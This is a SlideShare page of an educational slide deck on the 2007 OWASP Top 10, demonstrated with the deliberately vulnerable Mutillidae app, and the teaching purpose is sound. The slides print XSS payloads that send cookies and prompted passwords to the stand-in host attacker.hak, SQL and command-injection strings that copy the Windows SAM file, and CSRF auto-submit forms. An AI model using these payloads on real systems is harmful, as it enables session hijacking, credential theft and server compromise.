SlideShare a Scribd company logo

Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek

Download as PPTX, PDF
Magno Logan
Magno Logan

The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.

Technology
1 of 33
http://Irongeek.com Adrian Crenshaw
http://Irongeek.com  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m just a geek with time on my hands  I’m also not a professional web developer, creating crappy code was easy or me.   So why listen to me? Sometimes it takes a noob to teach a noob.
http://Irongeek.com  OWASP Top 10 http://www.owasp.org/index.php/OWASP_Top_Ten_Project (As a side note, I’ve copied quite of few of their descriptions and fixes into this presentation)  Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10  Ok, but what are those?
http://Irongeek.com The 2007 list includes:  A1 - Cross Site Scripting (XSS)  A2 - Injection Flaws  A3 - Malicious File Execution  A4 - Insecure Direct Object Reference  A5 - Cross Site Request Forgery (CSRF)  A6 - Information Leakage and Improper Error Handling  A7 - Broken Authentication and Session Management  A8 - Insecure Cryptographic Storage  A9 - Insecure Communications  A10 - Failure to Restrict URL Access The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
http://Irongeek.com  A teaching tool for illustrating the OWASP 10  Written in PHP/MySQL  Meant to be simpler than WebGoat  Simple to exploit, just to get the concept across  Easy to reset  Includes a “Tips” function to help the student
http://Irongeek.com 1. Download Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10 2. Grab XAMPP Lite and install it http://www.apachefriends.org/en/xampp.html 3. Put the Mutillidae files in htdocs 4. May want to edit xamppliteapacheconfhttpd.conf and set “Listen 127.0.0.1:80 “
http://Irongeek.com XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
http://Irongeek.com  Simple: <script>alert("XSS");</script>  Page Redirect: <script>window.location = "http://www.irongeek.com/"</script>  Cookie Stealing: <script> new Image().src="http://attacker.hak/catch.php?cookie="+encod eURI(document.cookie); </script>
http://Irongeek.com  Simple: <script>alert("XSS");</script>  Page Redirect: <script>window.location = "http://www.irongeek.com/"</script>  Cookie Stealing: <script> new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); </script>  Password Con: <script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src="http://attacker.hak/catch.php?username="+username+"&password="+password+"" >"); </script>
http://Irongeek.com  External Javascript: <script src="http://ha.ckers.org/xss.js"> </script>  Hot BeEF Injection: <script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>  How about the User Agent string?
http://Irongeek.com  Mangle XSS to bypass filters: http://ha.ckers.org/xss.html  BeEF browser exploitation framework http://www.bindshell.net/tools/beef  XSS Me Firefox plugin https://addons.mozilla.org/en-US/firefox/addon/7598  Exotic Injection Vectors http://www.irongeek.com/i.php?page=security/xss-sql-and- command-inject-vectors
http://Irongeek.com  Input validation.  Strong output encoding. htmlspecialchars()  Specify the output encoding.  Do not use "blacklist" validation to detect XSS in input or to encode output.  Watch out for canonicalization errors.
http://Irongeek.com Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
http://Irongeek.com The Code: “SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password).”’” or echo shell_exec("nslookup " . $targethost);'“ Expected to fill in the string to: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or Nslookup irongeek.com But what if the person injected: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’ or Nslookup irongeek.com && del *.*
http://Irongeek.com  Simple SQL Injection: ' or 1=1 --  Wish I could do this, but can't stack in MySQL/PHP '; DROP TABLE owasp10; --  Command Injections: && dir && wmic process list && wmic useraccount list && copy c:WINDOWSrepairsam && copy c:WINDOWSrepairsystem.bak  (use ; as a separator if you are running this on Linux)
http://Irongeek.com  SQL Injection Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/  SQL Injection Attacks by Example http://unixwiz.net/techtips/sql-injection.html  Command line Kung Fu http://blog.commandlinekungfu.com/
http://Irongeek.com  Input validation.  Use strongly typed parameterized query APIs (bound parameters).  Enforce least privilege.  Avoid detailed error messages.  Show care when using stored procedures.  Do not use dynamic query interfaces.  Do not use simple escaping functions.  Watch out for canonicalization errors.
http://Irongeek.com Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
http://Irongeek.com  Grabbing a local file: http://target.hak/index.php?page=source- viewer.php&php_file_name=config.inc  Tamper Data, POST data and an inadvertent proxy
http://Irongeek.com  Tamper Data Firefox Plugin https://addons.mozilla.org/en-US/firefox/addon/966  Paros http://www.parosproxy.org/index.shtml  WebScarab http://www.owasp.org/index.php/Category:OWASP _WebScarab_Project
http://Irongeek.com  Strongly validate user input using "accept known good" as a strategy  Add firewall rules to prevent web servers making new connections to external web sites and internal systems.  Consider implementing a chroot jail or other sand box mechanisms.  # PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider .building PHP locally to not include this functionality.  # PHP: Disable register_globals and use E_STRICT to find uninitialized variables.  # PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.
http://Irongeek.com A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
http://Irongeek.com  You already saw it with the malicious file include demo.
http://Irongeek.com  Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.  Validate any private object references extensively with an "accept known good" approach.  Verify authorization to all referenced objects.
http://Irongeek.com A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
http://Irongeek.com Target Web App Client Website the attacker controls 1. Session established with web app via a cookie. (already logged in) 2. At some later point, content that the attacker controls is requested. 3. Attacker serves up content that asks client’s browser to make a request. 4. Client makes request, and since it already has a session cookie the request is honored.
http://Irongeek.com  Let visit a page with this lovely link: <img src="http://target.hak/index.php?page=add-to-your- blog.php&input_from_form=hi%20there%20monkeyboy">  Don’t want to use a bad image? Try an Iframe: <iframe src="http://target.hak/index.php?page=add-to-your- blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>  Can’t use the GET method? Try something like: <html> <body> <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"> <input type='hidden' name='input_from_form' value="Test of of auto submitted form."> </form> <script>document.csrfform.submit()</script> </body></html>
http://Irongeek.com  CSRF Flaws Found On Major Websites, Including a Bank http://it.slashdot.org/article.pl?sid=08/09/30/0136219  CSRF Home Router Fun http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g- adsl-gateway-with-speedbooster-wag54gs/  CSRF in Gmail http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
http://Irongeek.com  For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.  Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)  POST alone is insufficient protection.  Consider adding Captchas and extra sessions values as hidden form elements.
http://Irongeek.com  Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deli berately-insecure-web-applications-for-learning- web-app-security
http://Irongeek.com  SamuraiWTF http://samurai.inguardians.com/  OWASP Live CD http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project  BackTrack http://www.remote-exploit.org/backtrack.html
http://Irongeek.com  Free ISSA classes  ISSA Meeting http://issa-kentuckiana.org/  Louisville Infosec http://www.louisvilleinfosec.com/  Phreaknic/Notacon/Outerz0ne http://phreaknic.info http://notacon.org/ http://www.outerz0ne.org/
http://Irongeek.com 42

Recommended

PHP MVC
PHP MVCPHP MVC
PHP MVC
Reggie Niccolo Santos
 
L'API Collector dans tous ses états
L'API Collector dans tous ses étatsL'API Collector dans tous ses états
L'API Collector dans tous ses états
José Paumard
 
PHP Unit 3 functions_in_php_2
PHP Unit 3 functions_in_php_2PHP Unit 3 functions_in_php_2
PHP Unit 3 functions_in_php_2Kumar
 
Optional in Java 8
Optional in Java 8Optional in Java 8
Optional in Java 8Richard Walker
 
Xml parsers
Xml parsersXml parsers
Xml parsers
Manav Prasad
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Php with MYSQL Database
Php with MYSQL DatabasePhp with MYSQL Database
Php with MYSQL Database
Computer Hardware & Trouble shooting
 
Database Architecture and Basic Concepts
Database Architecture and Basic ConceptsDatabase Architecture and Basic Concepts
Database Architecture and Basic Concepts
Tony Wong
 

Recommended

PHP MVC
PHP MVCPHP MVC
PHP MVC
Reggie Niccolo Santos
 
L'API Collector dans tous ses états
L'API Collector dans tous ses étatsL'API Collector dans tous ses états
L'API Collector dans tous ses états
José Paumard
 
PHP Unit 3 functions_in_php_2
PHP Unit 3 functions_in_php_2PHP Unit 3 functions_in_php_2
PHP Unit 3 functions_in_php_2Kumar
 
Optional in Java 8
Optional in Java 8Optional in Java 8
Optional in Java 8Richard Walker
 
Xml parsers
Xml parsersXml parsers
Xml parsers
Manav Prasad
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Php with MYSQL Database
Php with MYSQL DatabasePhp with MYSQL Database
Php with MYSQL Database
Computer Hardware & Trouble shooting
 
Database Architecture and Basic Concepts
Database Architecture and Basic ConceptsDatabase Architecture and Basic Concepts
Database Architecture and Basic Concepts
Tony Wong
 
02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5
Eoin Keary
 
Xss ppt
Xss pptXss ppt
Xss ppt
penetration Tester
 
PHP Frameworks and CodeIgniter
PHP Frameworks and CodeIgniterPHP Frameworks and CodeIgniter
PHP Frameworks and CodeIgniter
KHALID C
 
MySQL Database with phpMyAdmin
MySQL Database with phpMyAdminMySQL Database with phpMyAdmin
MySQL Database with phpMyAdmin
Karwan Mustafa Kareem
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security Risks
IndusfacePvtLtd
 
ASP.NET MVC.
ASP.NET MVC.ASP.NET MVC.
ASP.NET MVC.
Ni
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
If You Think You Can Stay Away from Functional Programming, You Are Wrong
If You Think You Can Stay Away from Functional Programming, You Are WrongIf You Think You Can Stay Away from Functional Programming, You Are Wrong
If You Think You Can Stay Away from Functional Programming, You Are WrongMario Fusco
 
파이썬 데이터베이스 연결 1탄
파이썬 데이터베이스 연결 1탄파이썬 데이터베이스 연결 1탄
파이썬 데이터베이스 연결 1탄
SeongHyun Ahn
 
Spring Security
Spring SecuritySpring Security
Spring Security
Boy Tech
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
Respa Peter
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review ProcessSherif Koussa
 
ACL in CodeIgniter
ACL in CodeIgniterACL in CodeIgniter
ACL in CodeIgniter
mirahman
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object Calisthenics
Guilherme Blanco
 
Sessions in php
Sessions in php Sessions in php
Sessions in php
Mudasir Syed
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Svetlin Nakov
 
MSDN - ASP.NET MVC
MSDN - ASP.NET MVCMSDN - ASP.NET MVC
MSDN - ASP.NET MVC
Maarten Balliauw
 
Overview of atg framework
Overview of atg frameworkOverview of atg framework
Overview of atg framework
Yousuf Roushan
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryNikola Milosevic
 

More Related Content

What's hot

02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5
Eoin Keary
 
PHP Frameworks and CodeIgniter
PHP Frameworks and CodeIgniterPHP Frameworks and CodeIgniter
PHP Frameworks and CodeIgniter
KHALID C
 
MySQL Database with phpMyAdmin
MySQL Database with phpMyAdminMySQL Database with phpMyAdmin
MySQL Database with phpMyAdmin
Karwan Mustafa Kareem
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security Risks
IndusfacePvtLtd
 
ASP.NET MVC.
ASP.NET MVC.ASP.NET MVC.
ASP.NET MVC.
Ni
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
If You Think You Can Stay Away from Functional Programming, You Are Wrong
If You Think You Can Stay Away from Functional Programming, You Are WrongIf You Think You Can Stay Away from Functional Programming, You Are Wrong
If You Think You Can Stay Away from Functional Programming, You Are WrongMario Fusco
 
파이썬 데이터베이스 연결 1탄
파이썬 데이터베이스 연결 1탄파이썬 데이터베이스 연결 1탄
파이썬 데이터베이스 연결 1탄
SeongHyun Ahn
 
Spring Security
Spring SecuritySpring Security
Spring Security
Boy Tech
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
Respa Peter
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review ProcessSherif Koussa
 
ACL in CodeIgniter
ACL in CodeIgniterACL in CodeIgniter
ACL in CodeIgniter
mirahman
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object Calisthenics
Guilherme Blanco
 
Sessions in php
Sessions in php Sessions in php
Sessions in php
Mudasir Syed
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Svetlin Nakov
 
MSDN - ASP.NET MVC
MSDN - ASP.NET MVCMSDN - ASP.NET MVC
MSDN - ASP.NET MVC
Maarten Balliauw
 
Overview of atg framework
Overview of atg frameworkOverview of atg framework
Overview of atg framework
Yousuf Roushan
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 

What's hot (20)

02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
PHP Frameworks and CodeIgniter
PHP Frameworks and CodeIgniterPHP Frameworks and CodeIgniter
PHP Frameworks and CodeIgniter
 
MySQL Database with phpMyAdmin
MySQL Database with phpMyAdminMySQL Database with phpMyAdmin
MySQL Database with phpMyAdmin
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security Risks
 
ASP.NET MVC.
ASP.NET MVC.ASP.NET MVC.
ASP.NET MVC.
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
If You Think You Can Stay Away from Functional Programming, You Are Wrong
If You Think You Can Stay Away from Functional Programming, You Are WrongIf You Think You Can Stay Away from Functional Programming, You Are Wrong
If You Think You Can Stay Away from Functional Programming, You Are Wrong
 
파이썬 데이터베이스 연결 1탄
파이썬 데이터베이스 연결 1탄파이썬 데이터베이스 연결 1탄
파이썬 데이터베이스 연결 1탄
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review Process
 
ACL in CodeIgniter
ACL in CodeIgniterACL in CodeIgniter
ACL in CodeIgniter
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object Calisthenics
 
Sessions in php
Sessions in php Sessions in php
Sessions in php
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
 
MSDN - ASP.NET MVC
MSDN - ASP.NET MVCMSDN - ASP.NET MVC
MSDN - ASP.NET MVC
 
Overview of atg framework
Overview of atg frameworkOverview of atg framework
Overview of atg framework
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 

Similar to Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryNikola Milosevic
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
SQALab
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
Oles Seheda
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Chris Hillman
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
Jeremiah Grossman
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
Rich Helton
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
Mallikarjun Reddy
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Cyber Security Alliance
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
Chris Shiflett
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)ClubHack
 

Similar to Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek (20)

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgery
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
4.Xss
4.Xss4.Xss
4.Xss
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
 

More from Magno Logan

DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
Magno Logan
 
Katana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da InformaçãoKatana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da Informação
Magno Logan
 
OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)
Magno Logan
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
Magno Logan
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE
Magno Logan
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
Magno Logan
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Magno Logan
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
Magno Logan
 
OWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BROWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BR
Magno Logan
 
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner EliasTratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Magno Logan
 
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Magno Logan
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
Magno Logan
 
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon BennettsAppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
Magno Logan
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
Magno Logan
 
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
Magno Logan
 
AppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck WillisAppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck Willis
Magno Logan
 
Just4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsJust4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applications
Magno Logan
 
GTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroGTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguro
Magno Logan
 
ENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na Web
Magno Logan
 
BHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsBHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applications
Magno Logan
 

More from Magno Logan (20)

DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
 
Katana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da InformaçãoKatana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da Informação
 
OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
OWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BROWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BR
 
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner EliasTratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
 
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
